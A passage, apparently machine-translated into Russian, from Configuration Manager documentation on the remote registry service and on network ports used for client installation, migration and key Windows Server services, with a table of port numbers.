Перед установкой этих систем сайта убедитесь, что служба удаленного реестра запущена на сервере системы сайта и что вы указали учетную запись установки системы сайта, если система сайта находится в другом лесу Active Directory без доверия отношение. Например, служба удаленного реестра используется на серверах, на которых работают системы сайта, такие как точки распространения (как по запросу, так и по стандарту) и удаленные серверы SQL.

Порты, используемые при установке клиента Configuration Manager

Порты, используемые Configuration Manager во время установки клиента, зависят от метода развертывания:

Список портов для каждого метода развертывания клиента см. в разделе Порты, используемые во время развертывания клиента Configuration Manager
Дополнительные сведения о настройке брандмауэра Windows на клиенте для установки клиента и связи после установки см. в разделе Параметры брандмауэра Windows и портов для клиентов

Порты, используемые миграцией

Сервер сайта, на котором выполняется миграция, использует несколько портов для подключения к применимым сайтам в исходной иерархии. Дополнительные сведения см. в разделе Необходимые конфигурации для миграции.

Порты, используемые Windows Server

В следующей таблице перечислены некоторые ключевые порты, используемые Windows Server.

Описание	УДП	TCP
DNS	53	53
DHCP-сервер	67 и 68	—
Разрешение имени NetBIOS	137	—
Служба дейтаграмм NetBIOS	138	—
Служба сеансов NetBIOS	—	139
Аутентификация Kerberos	—	88

Дополнительные сведения см.